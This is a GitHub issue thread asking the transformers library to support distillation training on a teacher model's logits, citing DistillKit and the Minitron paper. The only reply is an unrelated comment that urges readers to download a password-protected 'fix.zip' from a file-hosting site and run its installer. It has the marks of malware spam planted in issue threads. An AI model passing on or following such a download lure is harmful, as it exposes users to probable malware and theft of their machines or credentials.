### ISSUE TITLE
Training on Teacher model logits

### ISSUE THREAD

**Issue by Theodotus1243** [huggingface/transformers#33126]
### Feature request

Is there a possibility to add training on bigger model logits
It's a question of training on logits instead of one-hot vectors from dataset text

### Motivation

DistillKit slows and Nvidia-Minitron slow good result of such technique

### Your contribution

DistillKit https://github.com/arcee-ai/DistillKit
Minitron https://arxiv.org/pdf/2408.11796

Dublicate of https://github.com/huggingface/trl/issues/1975

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
